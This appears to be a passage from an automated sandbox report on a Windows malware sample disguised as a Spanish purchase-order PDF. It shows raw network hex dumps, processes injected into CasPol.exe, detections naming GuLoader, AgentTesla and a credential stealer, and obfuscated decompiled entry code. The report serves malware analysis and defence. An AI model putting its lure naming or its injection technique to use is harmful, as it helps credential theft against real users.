fd 84 52 54 98 82 d9 6f 14 03 d2 ca 9f 00 6c ec 2c 14 9d cb 06 0f ab 51 fa 42 72 5a 74 50 5e 27 e2 e1 e9 3c b0 c1 09 07 2e 89 8e e6 96 e3 89 3b 05 33 62 12 d8 59 e9 04 71 c8 42 ec 7e 68 7b a8 7b d4 ce 35 6a f6 85 d9 ea df 31 dd c1 Data Ascii: :pl8j*xqZiP1vVtgMy8Wq3%_VbHnn^Ec)L-8m%TwZ([Gbowc_CR`Y~EBTj}k=V-RTol,QBrZtP^'<.;3bYqB~h{{5j1
2022-01-24 13:09:50 UTC	155	IN	Data Raw: 53 7a 5c ff 24 0d 63 68 19 2a 4b ff a8 05 f3 ce b7 95 91 40 f7 5a 15 ee 3d b6 d6 96 6b 5f c4 2d ce 61 6c d0 e0 54 bb 35 9f 4a 5a 6b 56 ba 2e cd ac 93 90 9d 85 ed 1a 55 fc 69 b7 97 3b a6 ea 65 9b ba 33 8d 2b 83 e6 25 2b 47 b4 40 21 4c 3c 05 27 a0 f3 10 c7 26 d5 fb 23 05 41 81 6a 3e 18 55 82 d6 93 30 40 31 a6 92 61 19 fe c6 de 31 9c 86 c7 ee c7 f5 a7 d0 fe 8e 8e a0 1c d0 50 2a d7 50 c4 be 2f 69 15 b1 bd b8 c8 bd 1f 53 1f ce b9 96 a7 b4 6d 35 49 56 5a 1a 0e c9 92 ac 65 77 c3 ee ad 98 f3 10 12 1b ba 99 be 7a 65 41 eb a8 20 22 71 76 aa 82 6b 81 43 a4 b0 a1 0f 5c 59 32 d2 c3 dd 9a 70 9d 11 a8 cf 75 88 8a 77 8c 53 8d be ad 6f bb 09 00 33 55 a6 19 7d 70 16 ed 51 83 53 25 20 a6 5a 2e 60 5e 3b ab 32 f9 9c 55 dc 84 aa b5 d2 55 5c a3 20 75 24 1c 19 87 c1 9c c9 1c 48 Data Ascii: Sz\$chK@Z=k_-alT5JZkV.Ui;e3+%+G@!L<'&#Aj>U0@1a1PP/iSm5IVZewzeA "qvkC\Y2puwSo3U}pQS% Z.`^;2UU\ u$H
2022-01-24 13:09:50 UTC	159	IN	Data Raw: 1f 70 61 3f 86 e5 06 1f 7a 1c e8 04 f1 f1 d6 53 df 62 50 37 85 84 a1 ad f4 ff 05 07 7c dd 6e bb 94 a9 6f 8f 17 3c f5 60 bd 9b d1 b6 93 33 44 b8 e6 3c 20 94 be 7a 8a 5e 72 f3 59 fb 34 1a c0 58 5c 69 ac 10 b2 67 16 10 b5 24 88 5a 80 67 a8 f6 b4 5f fa 45 37 89 6e 4a d1 47 db 1f 00 c9 ac c7 67 2f 78 5d db f9 3c 81 1d 90 bb 8f 1b 24 22 48 5c 3f 8f d6 8c b4 47 0d d1 d2 55 c0 88 7b f8 0d 25 23 e8 eb 25 3d ab 88 4a fa cf 02 16 3b d9 52 65 6c 8f c6 02 6d dc 61 aa 25 ef b9 6d 5a 32 68 83 89 fd 8f 48 55 95 6e 22 db 7a 34 1a d7 bd e8 a2 71 63 86 c2 5e 8d 56 0f 5b 15 b2 45 39 25 7d 75 54 56 00 bc e8 a4 21 ab 35 9c bb d9 5e 6c 42 be a1 ab 43 92 9f 44 c6 44 e7 94 2a 79 e3 75 d8 b8 3c 1a a6 29 6c 37 18 43 cf 25 4f c3 a4 b7 65 4a 32 ee ac 4b 93 35 d3 0b 91 50 ff a0 c3 7e Data Ascii: pa?zSbP7\|no<`3D< z^rY4X\ig$Zg_E7nJGg/x]<$"H\?GU{%#%=J;Relma%mZ2hHUn"z4qc^V[E9%}uTV!5^lBCDD*yu<)l7C%OeJ2K5P~
2022-01-24 13:09:50 UTC	163	IN	Data Raw: 57 6b 31 cc 00 a2 e5 41 fe f0 26 e1 25 f2 da 9f 38 2d b0 22 0a fd 08 e7 70 29 52 88 6a b5 9b 9b 50 44 f8 ea e1 16 eb 70 1e 3f c3 ea 80 0a 8b b9 8d de 8b ed 61 21 dd f3 7d c5 48 18 7a 47 48 da 41 c2 2e d8 71 b3 be c1 47 de 33 7c 71 88 0d a0 96 dc f1 fd 6d 94 d2 75 67 3b 9a 4a 39 2d 00 b4 59 ab 8a 13 a2 b8 5e 51 b3 59 1f 1f 40 df 81 fc 69 71 bc 1b ce 15 dc 0e d7 5e fd 73 56 50 5b 92 64 b2 d0 20 45 9a 7e cc 6e 22 93 bc 84 ba 04 e3 d7 70 e6 1a d1 2f 92 23 40 a9 89 2f 34 99 98 6b e6 a1 73 e0 5b ea 32 08 18 4e 4d 78 88 d8 33 fa 14 01 b5 b4 cb 55 04 71 73 a1 92 52 2c c5 37 41 6f 5a 97 54 38 9c 14 d9 8b d6 67 76 7a 4d da e8 3a 22 fd a4 48 9c 3e a9 20 58 5e 2e 8c 27 d9 a7 63 17 32 6b 72 d0 8a 6a f8 b6 2f 2e ac f9 39 e9 42 95 6d eb cf 3b 02 2b d8 43 23 e2 a6 c0 f6 Data Ascii: Wk1A&%8-"p)RjPDp?a!}HzGHA.qG3\|qmug;J9-Y^QY@iq^sVP[d E~n"p/#@/4ks[2NMx3UqsR,7AoZT8gvzM:"H> X^.'c2krj/.9Bm;+C#
2022-01-24 13:09:50 UTC	167	IN	Data Raw: 53 6a 9c 77 12 ee 4c 22 3d 42 0d ed 98 15 52 63 4f 1b 66 52 dd 59 ab 8e 8a ff 96 53 91 5c e3 2a 00 4c e1 e5 4c 69 0b d7 51 0b 0a 21 42 5f 3d 5e 91 4b 7a 14 b5 7a d4 02 11 c5 52 6f d4 ed 5c ba d4 72 69 b0 56 73 69 60 1d 45 51 03 e6 e3 81 47 3e da b4 ec 1c 10 de 01 1e 79 29 e3 7f da 7f 48 eb 26 46 26 9d 56 c1 62 fd 91 38 6a a8 d3 24 cd 8c 98 dd 81 26 1d a6 f3 b5 9e fa 3f 94 4d 1f 07 2b 96 70 9d 76 88 b5 b3 55 99 6c ad 64 77 e1 67 eb 94 9e 3e 1c ec 19 62 ac d6 e4 0f aa 9c 61 1d 5c f2 a2 c3 8a 1a 46 ae 6c c9 41 b3 ae af e7 92 d1 c0 ef b6 14 4c 61 9b 0d d1 16 5a 67 dc 02 95 7f 3f 40 54 9b b4 38 5c 80 20 cf 8a e5 12 11 a7 62 be 83 4f 1f 6e 60 d7 0f f5 06 70 7b 03 ea 7a f0 97 f3 2f dd 2f d8 59 84 94 a3 aa f4 4f 02 05 5a bd 6e 2a 1c a5 6d 9e 17 f5 f3 1f be ab f5 Data Ascii: SjwL"=BRcOfRYS\LLiQ!B_=^KzzRo\riVsi`EQG>y)H&F&Vb8j$&?M+pvUldwg>ba\FlALaZg?@T8\ bOn`p{z//YOZnm
2022-01-24 13:09:50 UTC	171	IN	Data Raw: c2 1e 64 7d f8 a5 cb 0a 8c 3d 8a ff 4e de e9 99 5a e1 be 8e 03 68 a7 ad 8f 2f b5 5a fd fc 90 4e d1 a4 c9 c9 62 8e 36 c0 d1 14 3a d1 e3 59 b1 0e df d0 87 0d e5 eb 7b 3e 73 c2 5d 19 05 52 df 78 39 78 ce 49 a0 22 1e fd 82 39 63 de 0a 2c 21 a8 23 ee 82 d9 46 1e 49 5d 4d 2c e9 41 e1 3f d5 fc 58 d9 bf 18 32 94 65 ce fe 00 52 d7 28 07 e1 20 2a 21 40 42 4b f7 9a 7a 53 8c fb 6a 33 5c ba 5a d6 8e e2 f2 94 8c 97 4f 75 5b c1 7b 86 e6 31 69 81 da 4b e2 2e 20 f7 2e 42 26 f6 48 07 14 19 77 ce eb 35 c2 e7 1e 0a 1d 3b b9 a9 72 a7 ba 4c 9a 4d 4e a8 34 f8 af 82 e0 fc 47 ce d0 b6 83 1d 03 48 70 0f cc 4b e0 02 da 6d 45 e9 f9 40 35 0b 27 12 ce 9e 92 45 6a 9c ce 26 a2 8d cc 68 f0 5d c0 c5 f0 c8 9e ac 25 96 22 1e 73 9e e7 74 2c b2 8a c8 b3 2d 93 76 44 40 64 77 16 b0 55 fe 3d 61 Data Ascii: d}=NZh/ZNb6:Y{>s]Rx9xI"9c,!#FI]M,A?X2eR( *!@BKzSj3\ZOu[{1iK. .B&Hw5;rLMN4GHpKmE@5'Ej&h]%"st,-vD@dwU=a
2022-01-24 13:09:50 UTC	175	IN	Data Raw: 1c b3 b8 77 96 b6 6d 35 45 c0 5a aa 7a 1b be e1 4b 46 c1 df 9c a1 f3 86 12 29 aa 7f dc 07 65 65 c9 29 20 22 52 9e aa 58 19 e4 41 d9 a4 d2 3d 5e 7a 61 a6 27 b4 96 03 08 13 d5 cf 1d 3e 30 77 8c 43 1b be a9 4f 1a 5e 34 77 df 94 1b e9 c8 16 7b 9d 6c 46 c3 01 99 36 ea 30 5c 3b ab 32 6f 9c 6d dd 62 a8 c2 85 26 cd 9e 29 7b 24 8a 19 be d6 49 cb 77 8c d0 2e fd cd dd 0f 0d 27 83 e7 62 03 15 a7 a3 2a 2d 94 4d 1b 68 ed 4e ba 48 c9 b4 62 be 93 c2 1c 17 dc 45 9e d5 2f e2 df ad 87 5c 40 e9 13 26 95 56 20 77 ad be df 05 39 0a 6b 4b 57 21 f8 69 ff ef 80 32 0a 51 21 3b 86 ec b6 c3 a0 8a 34 b9 57 c1 e9 3c e1 8b 70 fe 79 dd 59 8c 4f 94 45 23 fe 7d 52 02 8d 05 12 3a cc b5 3d 3a 17 1a 9a 07 53 7a 5e 68 66 58 5c ce ab a4 8e 1f 94 f1 97 58 d7 59 00 64 60 72 4c 53 10 37 4b 9f 2e Data Ascii: wm5EZzKF)ee) "RXA=^za'>0wCO^4w{lF60\;2omb&){$Iw.'b*-MhNHbE/\@&V w9kKW!i2Q!;4W<pyYOE#}R:=:Sz^hfX\XYd`rLS7K.
2022-01-24 13:09:50 UTC	179	IN	Data Raw: 1b a6 94 3a cd 58 d2 2a 29 10 2d ce 5b be d8 f0 ed e7 91 bd 17 5f f1 69 ae b4 2d 8b eb 69 98 bc 36 8b 3e 8d f1 08 17 57 a6 5b 3b 78 3b 06 30 a3 fe 1a e1 46 e8 c1 0b 18 61 ad 45 18 19 57 a3 fe a2 1b 6c 29 92 a5 59 2f c4 ce fa 03 b8 be fc f7 bc d0 6c 08 35 40 4c 7d d4 0d 90 f6 02 98 06 7c e9 92 ca 67 60 b8 9a fe 56 11 1e ce a8 86 a4 b4 6d 35 55 46 5e 1a 78 fd bc bc 4a 44 f3 dd 9c 81 f1 10 12 1b be b9 d9 7a 65 41 f9 2b 21 22 52 08 aa a2 19 02 43 a4 a4 b4 0c 5c 7a 61 a6 91 b6 f4 17 ee 11 88 cd 75 0c 32 77 ac 40 8d be ad 4e fc 58 49 77 55 a4 19 ed c8 16 ed 8d bf 56 25 03 e4 26 51 03 5e 3b ab 32 f9 9d 55 1d 9e ba af 86 ea ff 9c 29 5b 25 1c 19 7d c0 8f cb 0a 8c 3d 1c df ce dd 0f 9b 27 c1 e2 84 01 68 a7 ad 18 2f 1a 40 1b fe ef 4e 11 a2 cb c9 63 8e 9a d3 1c 17 dd Data Ascii: :X*)-[_i-i6>W[;x;0FaEWl)Y/l5@L}\|g`Vm5UF^xJDzeA+!"RC\zau2w@NXIwUV%&Q^;2U)[%}='h/@Nc
2022-01-24 13:09:50 UTC	183	IN	Data Raw: 3e 40 de e2 0b 08 f0 5c 71 37 07 45 b9 48 82 dc 2a 85 82 53 ee f7 99 b7 e9 8c a8 6d d7 e9 95 36 8b bc 58 93 e8 9b 25 36 54 5c 2a d2 17 5c 53 1f 85 e7 ab 3b 57 7f 1a e0 36 56 aa 89 73 30 bb 29 f6 f4 fb 3a de c9 96 70 13 f1 18 69 75 ad 34 39 45 c6 23 3a c8 46 ad 7a 8b 7f e4 0d 96 f0 72 b1 43 c5 ae 01 76 97 8a 7b a0 ce 2f a5 95 03 ca b1 e6 fa 28 c1 2f 61 5c 42 fb 21 ef 45 96 d6 1a 1e f6 80 8a 87 2d 3a e8 7f b0 1a 15 3a 3d ab d8 b9 15 e6 a5 cb 0e cb 18 b7 33 db e6 96 c2 ff ec a1 3b f6 42 e4 42 f1 3d a4 86 47 a1 33 67 f2 b0 1c 5a 55 eb 0c df 4a bf 49 d0 f9 b9 31 6e e1 01 90 4f c4 d7 3b 9b 7e 02 d9 03 95 dd 73 cc de 63 03 a4 06 74 a8 1d 7f 96 97 85 0d 6e 94 69 85 7b a3 7b e1 b5 b9 69 ed f3 7e 86 e8 f2 b9 12 7c 96 c5 fc 43 66 60 f2 9a 27 1b 51 29 a3 e6 39 ab 43 Data Ascii: >@\q7EHSm6X%6T\\S;W6Vs0):piu49E#:FzrCv{/(/a\B!E-::=3;BB=G3gZUJI1nO;~sctni{{i~\|Cf`'Q)9C
2022-01-24 13:09:50 UTC	187	IN	Data Raw: 52 ff 89 2b 63 ed 74 22 43 aa 93 40 e4 c5 18 09 da d4 46 75 b6 9f e7 13 00 c8 88 bf a7 f9 0a 79 85 27 f6 95 48 e9 88 5e 08 8c 24 39 de 65 f5 07 df 9d 6f 83 7b 42 72 e1 22 af cd 25 c5 3d f0 7e cd 0f e5 5c 35 7c 74 92 f9 a5 99 be a1 be a8 d9 15 6e 75 bc 78 b0 e5 84 cb 47 f7 c4 76 9e 12 7b f6 f4 6c be 47 19 f1 a9 b6 37 4c 41 08 20 21 c2 ef b4 0a 4a 2c dc be 49 85 34 75 1d cd 62 eb a0 ec 7c 8b 1d d9 c4 d5 32 8a 56 f5 d0 2f 61 f5 92 22 7b e7 bb a0 71 14 b5 53 e6 19 86 41 5d 45 5c 3a 48 b3 fb df de 63 a1 fc 8a 6b 2f 57 dc dd fe c3 b5 99 10 a3 9c 71 75 74 39 c9 7b 5d dd d4 57 aa 92 1c ef 56 16 99 10 3a 82 f4 dc f2 e9 53 35 aa 4b 66 27 bd 9b 90 3a cd 59 01 3a 8e 3d 28 ce 4b af 1e f0 4d ed 84 ad 13 5e 36 69 89 bf 28 8b eb 68 51 9c b5 a3 3b 8d f0 29 dd 57 e9 41 3f Data Ascii: R+ct"C@Fuy'H^$9eo{Br"%=~\5\|tnuxGv{lG7LA !J,I4ub\|2V/a"{qSA]E\:Hck/Wqut9{]WV:S5Kf':Y:=(KM^6i(hQ;)WA?
2022-01-24 13:09:50 UTC	191	IN	Data Raw: 06 81 3e 1b 6e b5 49 83 4a 44 3e 6b 51 43 60 39 1f 70 b5 35 bf a9 4c b2 10 6d a7 58 b9 bb b3 17 1d ee 02 fb 3e 3a 7f 57 32 ce 17 91 e4 23 3e a8 d1 f7 42 4f bf 03 6a ac ce 81 1a a9 0c 2c 8f f9 27 50 e9 78 82 a5 16 fe 5d 09 dc a7 40 a2 ec a8 9a af 65 8e 4e 82 d9 fb 8e 4c f0 22 4d 0a 7b 93 15 44 7a cb da df 39 fa 17 30 29 0b 8f 65 c5 23 68 5a 7f 85 78 68 c6 c3 80 35 8b 8b 05 21 bc 97 a2 8e e3 78 5e 20 2d ae 1e 8b dd 91 0e e5 b0 ac 86 b4 17 1b 14 fc 52 e7 63 b5 84 dd 45 f0 0b 3d 2a 5e f6 2e 39 79 f2 dd 25 ce 8b 76 11 e4 1f 30 c3 9d 70 5a 0e bb 87 a7 63 1e 1f 15 ab 65 81 fb b9 3a dd 31 39 36 e0 94 c4 d9 80 7f 50 6f 1d a3 00 46 95 c3 08 ea 48 ae 9a 1c d3 e3 a2 4a f1 4c 28 cd e6 7b 65 f6 c9 05 ee 31 21 8f 2e 84 50 08 b4 2d 2a 27 e1 bd c7 02 7b 65 b5 f7 e0 3a f2 Data Ascii: >nIJD>kQC`9p5LmX>:W2#>BOj,'Px]@eNL"M{Dz90)e#hZxh5!x^ -RcE=^.9y%v0pZce:196PoFHJL({e1!.P-'{e:
2022-01-24 13:09:50 UTC	195	IN	Data Raw: ac a5 62 dd d9 b3 68 72 b1 fd d0 3c 58 2a 90 b1 ee 61 73 a7 72 52 f0 83 41 75 d6 58 88 0b 5c 0a 6b 7b 79 45 94 93 ff 4c f0 b1 7a 1f 13 86 d1 82 da c3 d6 7d 41 31 3b 44 87 28 cf 5b 2f 90 79 ad 2a 7b 3f fd 6f a1 90 6c 52 b9 ca 63 7e 56 e2 47 51 2e 0d 9e fb 08 2a fc 19 44 02 34 30 58 e0 e7 e6 95 96 df ee 3c 97 3e 6d 4a 38 89 20 69 78 b4 3d bd 67 53 23 41 59 5b 58 3e 17 78 b5 0f a9 9f 6a 91 14 7d a1 4f b4 cf ad 22 1b de 3a f5 2e 21 52 34 22 ce 10 bd c4 29 5f b9 d8 e6 4e 70 b2 70 5c 80 ad a1 12 da 3b 24 eb bc 2d 35 db 4a c1 8d 15 90 70 07 a8 84 4d ce e8 9f 8a 82 43 80 4e f2 d2 fb 8e 76 d6 43 6d 16 5b 93 02 4c 35 e5 b5 f4 30 eb 26 21 33 14 8e 78 98 15 4b 4b 6e 89 78 69 af fd 80 37 e7 8c 15 44 88 87 d0 a6 eb 71 5e 20 2d ae 1e 87 c0 bc 2f f5 82 b4 9d b5 76 11 71 Data Ascii: bhr<XasrRAuX\k{yELz}A1;D([/y{?olRc~VGQ.*D40X<>mJ8 ix=gS#AY[X>xj}O":.!R4")_Npp\;$-5JpMCNvCm[L50&!3xKKnxi7Dq^ -/vq
2022-01-24 13:09:50 UTC	199	IN	Data Raw: 4e 51 52 6f cf f6 44 45 31 cb d1 e4 7c 5c 1d 04 d2 ee f7 9c 76 9c 62 a8 88 10 78 71 1f ed 31 fe be ea 29 88 15 24 16 32 c3 5c 87 ab 79 89 f8 dd 20 25 50 9d 45 35 67 33 15 ff 5b 94 f9 27 ad 84 f8 ca eb 9e 96 f1 4c 33 41 70 69 18 b2 dc c9 6d e9 49 43 9e a9 ab 6e f5 44 84 80 d4 60 1a c6 c0 7c 5b f1 3f 68 fe 9e 2b d9 f1 aa ad 14 ef ce a3 79 73 8c b2 ec 38 41 61 a9 b5 f5 7e 73 ae 7d 45 fa a4 45 6b ea 39 af 19 54 1d 2c 2c 25 52 f8 b0 8f 5c f1 b5 7c 43 53 db b5 a3 d7 ad c1 7b 51 30 2a 49 9f 02 8d 5e 30 8f 79 9e 36 74 2b fd 35 ac 93 6e 33 bb fd 68 7f 4a ad 51 58 0d 6f 96 fd 19 27 c0 08 19 15 58 1a 31 c7 eb cb 9a f5 e9 e4 3c e3 3c 65 10 3f b7 39 0a 68 b4 3a 91 2e 67 04 5a 7e 57 62 38 1f 7a c1 2c be 84 56 a7 02 6d d4 74 8d fa b0 16 1b d4 3d e9 4d 29 5b 40 0e ea 00 Data Ascii: NQRoDE1\|\vbxq1)$2\y %PE5g3['L3ApimICnD`\|[?h+ys8Aa~s}EEk9T,,%R\\|CS{Q0*I^0y6t+5n3hJQXo'X1<<e?9h:.gZ~Wb8z,Vmt=M)[@
2022-01-24 13:09:50 UTC	203	IN	Data Raw: 3f 83 fe 2d 16 56 a8 46 34 5f 39 02 3e ad e0 04 ed 04 ef d7 1a b9 5e bf c4 2d 0b f6 e6 ec 23 5e 7c a8 d8 b7 d8 0a d7 6f b3 12 39 ef ec be a9 51 39 19 a4 05 5e fc 81 1c 01 b3 10 19 53 6d 78 d7 df e6 35 a9 0b bb 44 90 4b df 39 cf b6 35 34 24 c4 6f 47 14 7d dd bc 8e ca 19 f6 fd 9c b0 72 45 17 3b bc 98 d6 72 61 47 e9 aa 61 27 52 08 b8 03 36 05 63 a6 a5 86 8e 1d 70 67 86 b1 a9 e6 96 ab 19 a8 ce 67 8d 0f 65 0d 22 81 9e ae 4d ed dd 10 66 d4 ff 08 68 99 1a cd 9e ae 41 a5 d6 f6 b7 64 10 df 72 af 12 f8 9d 5f d9 84 a8 be 99 f8 7e f9 2f 6b 25 1d 11 63 c0 ab c3 0b 9d 1d 1f ff cd d5 04 9c 21 ef ea 8a 03 79 26 94 04 21 92 4d 19 ff f1 5e af aa cb c8 63 92 a5 c0 1c 05 5d a6 9b 79 2d 19 d8 de 8d 0a 76 e5 1d 37 14 f9 3d 17 b2 5d fd 78 2b f9 59 4c 57 23 e4 e3 e3 3d 83 d5 06 Data Ascii: ?-VF4_9>^-#^\|o9Q9^Smx5DK954$oG}rE;raGa'R6cpgge"MfhAdr_~/k%c!y&!M^c]y-v7=]x+YLW#=
2022-01-24 13:09:50 UTC	207	IN	Data Raw: 51 7f f9 9a 3f 7f 68 a9 b4 43 0a bd 4e e9 86 9a b6 69 c3 1c 28 20 3e e6 b6 f2 78 bc a3 96 f0 32 fb dc df fc 92 36 a9 1e 17 9b 75 64 22 2a c3 e2 02 fe 56 17 bf 81 2e 76 c5 0e 10 50 71 9f 4f c0 a7 e6 40 b7 ab 44 b5 a6 4b be 9d 28 a4 4a 43 9b 20 18 26 ce 4d a0 d5 fe e3 ef 89 bc 91 12 f9 69 ad 9c 23 85 fa eb d5 9a 34 88 30 83 f8 20 12 57 a7 58 32 5c 39 07 3e a0 e6 0a e7 47 f8 cf 00 30 6d a5 42 1e 11 79 a9 f6 aa 13 79 2e 9a b0 4b ae 5c ef f0 1e b6 a3 f0 d9 b6 cd 62 00 38 5e 47 60 da 05 84 e6 01 85 08 5b fe 89 db 75 e1 21 8b fc d4 51 0b dc 39 0f a6 a6 ec 75 4b 44 d9 0b 6a 7e a9 8e c8 5d e1 5c dc b3 9a 18 0f 15 ac 18 7f 7f 45 41 e9 a8 35 24 72 09 b8 01 02 0a 45 84 a5 86 8c 41 74 48 a1 be a1 e6 96 77 10 ba 4e 35 19 20 f6 15 42 9f 3f ed 5e 91 41 47 65 3c a8 0b 84 Data Ascii: Q?hCNi( >x26ud"*V.vPqO@DK(JC &Mi#40 WX2\9>G0mByy.K\b8^G`[u!Q9uKDj~]\EA5$rEAtHwN5 B?^AGe<
2022-01-24 13:09:50 UTC	211	IN	Data Raw: 51 84 90 f8 6e 4b 58 92 75 27 94 79 07 12 cc b3 76 aa 7f 64 9f d0 cc 5f 4f 07 43 1c 4a 5e 3e 07 6e 74 2b 45 b5 52 eb 24 69 b8 05 9f a3 c8 d4 56 5d bb b9 a3 f2 05 b6 4e 98 cc 99 14 2a 73 bd fd 0e 9e 03 19 f8 a1 fd 3e 29 49 df 05 21 d3 6e 8c 7a 4d 2d ef bd 5b 07 34 06 1a a1 53 f4 a5 b8 fd 1a 16 ae db de 3b 82 5e 83 d9 44 79 ff 94 22 7b 77 3a 0c 49 1f 95 50 e6 87 83 a2 69 c2 b0 32 4e 33 f5 bb e7 79 a2 b7 8e cc 2d f7 d8 dc f0 87 be 12 02 9a 6e 7b 7f 3d 24 45 71 09 e6 d4 77 aa 9a ac cf c4 1b 95 16 68 03 a9 de a9 e8 50 3d aa ca 15 4f 0b c2 95 4e cd 28 c2 49 28 2a 2d e1 4b 81 db 87 ed 90 81 da 13 71 f1 1d ae fc 2d ee eb 06 98 f2 34 e2 3e e2 f0 46 16 25 a6 34 3a 2d 39 72 30 c6 ee 78 e3 68 e8 a2 08 57 63 c0 45 37 19 13 a7 97 a2 68 6e 5d 91 8b 59 5b c5 81 fe 71 b8 Data Ascii: QnKXu'yvd_OCJ^>nt+ER$iV]Ns>)I!nzM-[4S;^Dy"{w:IPi2N3y-n{=$EqwhP=ON(I(-Kq-4>F%4:-9r0xhWcE7hn]Y[q

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ORDEN DE COMPRA 80107.pdf________________________.exePID: 4600, Parent PID: 2368

General

Start time:	14:10:05
Start date:	24/01/2022
Path:	C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Imagebase:	0x400000
File size:	234664 bytes
MD5 hash:	AF7C27FD6E49538AA93A667D67463C51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000000.289570164.000000000040D000.00000020.00000001.01000000.00000003.sdmp, Author: Florian Roth
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 5340, Parent PID: 4600

General

Start time:	14:10:25
Start date:	24/01/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Imagebase:	0x3c0000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 4820, Parent PID: 4600

General

Start time:	14:10:26
Start date:	24/01/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Imagebase:	0x310000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 5640, Parent PID: 4600

General

Start time:	14:10:27
Start date:	24/01/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Imagebase:	0xea0000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.335904974.0000000001300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4568, Parent PID: 5640

General

Start time:	14:10:27
Start date:	24/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ORDEN DE COMPRA 80107.pdf________________________.exePID: 4600, Parent PID: 2368COMMON

Execution Graph

Execution Coverage:	30.2%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	1.6%
Total number of Nodes:	635
Total number of Limit Nodes:	108

Executed Functions

Function 004015B8 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 809
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			_entry_() {
				signed char _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t35;
				signed int _t41;
				signed int _t50;
				signed int _t58;
				signed char _t64;
				signed char _t65;
				signed char _t68;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				void* _t74;
				signed int _t75;
				signed int _t77;
				intOrPtr _t78;
				intOrPtr* _t80;
				void* _t81;
				signed int _t82;
				signed int _t83;
				void* _t85;
				void* _t97;
				signed int _t98;

				_push("VB5!6&*"); // executed
				L004015B2(); // executed
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 ^ _t28;
				 *_t28 =  *_t28 + _t28;
				_t29 = _t28 + 1;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				_t75 = _t74 + _t74;
				asm("in eax, dx");
				_t78 = 0xeb;
				asm("sbb [0x994ed3de], ch");
				asm("stc");
				asm("sahf");
				asm("repne mov al, 0x41");
				_t30 = _t82;
				_t83 = _t29;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				_t77 = _t75;
				asm("outsb");
				if(_t77 == 0) {
					L5:
					_t31 = _t30;
					_t97 = _t85 - 1;
					asm("popad");
					asm("popad");
					asm("outsb");
					if(_t97 >= 0) {
						L13:
						 *_t31 =  *_t31 + _t31;
						 *((intOrPtr*)(_t31 + 0x10)) =  *((intOrPtr*)(_t31 + 0x10)) + _t31;
						L14:
						asm("adc byte [eax], 0x0");
						 *_t31 =  *_t31 + _t31;
						L15:
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						L16:
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						L17:
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
